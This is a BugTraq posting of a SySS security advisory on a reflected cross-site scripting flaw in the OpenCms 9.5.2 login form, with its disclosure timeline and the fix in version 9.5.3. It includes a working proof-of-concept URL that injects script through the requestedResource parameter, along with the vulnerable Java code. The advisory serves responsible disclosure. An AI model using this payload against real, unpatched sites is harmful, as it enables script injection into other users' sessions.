BugTraq
[SYSS-2015-063] OpenCms - Cross Site Scripting Feb 22 2016 01:50PM
rainer boie syss de
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-063
Product: OpenCms
Official Maintainer: Alkacon Software GmbH
Affected Version(s): 9.5.2
Tested Version(s): 9.5.2
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Maintainer Notification: 2015-11-27
Solution Date: 2016-01-13
Public Disclosure:
CVE Reference: Not yet assigned
Author of Advisory: Rainer Boie (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OpenCms is an open source web content management system. Alkacon
Software GmbH is the official maintainer and the major contributor for
OpenCms (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found out that a logged on user with at least workspace
access is vulnerable to a reflected cross-site scripting attack using
the OpenCms login form. An attacker can use an URL to create the attack
as the attack vector is triggered by an HTTP GET request.

It is recommended to filter and escape transmitted parameter values.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using a fresh installation of OpenCms in version 9.5.2 and generating
and logging in with a user with workspace access rights, the following
attack vector was used:

http://<HOST>:<PORT>/opencms/opencms/system/login/index.html?requestedRe
source=%2Fsystem%2Fworkplace%2Fcommons%2Fdisplayresource.jsp%3Fresource%
3D%252Fsuchergebnis%252Findex.html";alert('XSS');//&__loginform=true

The parameter is handled by the function appendWorkplaceOpenerScript in
the file CmsLogin.java.

The vulnerable code section is:

html.append("\tvar openUri = \"");
html.append(link(openResource));
html.append("\";\n");
html.append("\tvar workplaceWin = openWorkplace(openUri, \"");

The JavaScript code is executed in the web browser as it is included in
the following affected part of the HTML response:

function doOnload() {
var openUri = "/opencms/opencms/system/workplace/commons/displayresource.jsp?resource=
%2Fsuchergebnis%2Findex.html";alert('XSS');//";
var workplaceWin = openWorkplace(openUri, "OpenCms1448623274999");
if (window.name != "OpenCms1448623274999") {
window.opener = workplaceWin;
if (workplaceWin != null) {
window.close();
}
}
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The main maintainer Alkacon Software GmbH published 01/13/2016 version
9.5.3 where the flaw is fixed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-11-27: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Vulnerability reported to the official maintainer Alkacon
Software GmbH
2015-12-04: Response from maintainer: The issue is fixed in version
9.5.3 which is planned to be published 01/13/2016.

2016-01-13: Release 9.5.3 published

2016-01-20: Checked and confirmed fix of vulnerability in version 9.5.3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web site for OpenCms
http://www.opencms.org
[2] SySS Security Advisory SYSS-2015-063
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-20
15-063.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Rainer Boie of the SySS GmbH.

E-Mail: rainer.boie (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.
asc
Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBCgAGBQJWyxBmAAoJEFwSgj1gjXrpapYH/1eKvLsApiVYoAn84Guy2sbn
n2LJUORCMkByi2gDCsMij2Y2gnF3cebhsmsos0e6UdGl4f3ztRAnNFI5JLKZ9GjB
xfbNZ0kVqaocETTkqpMWNcEpM57E5/2fnsOEdxZjjMA5wg6DGLZYzRAxx/nEWSCn
eQGf8BCKLufLp2MAdNfjCKr4zBE8i+ZBF6QYAoG3YItbIXZvH5WLxfcsPtacoj2K
LQHW34V9k6OFDmztfmYo42BhhGy1pj7zcZhlQDL+a3iqvDGeGS2F27vnRgbFFBVD
3K6sfQk78Fx4ceKn32ew8knahUl+DrzgaYnR/JZqGdjOSg871j2jiPt8Esqq2lc=
=bRHg
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus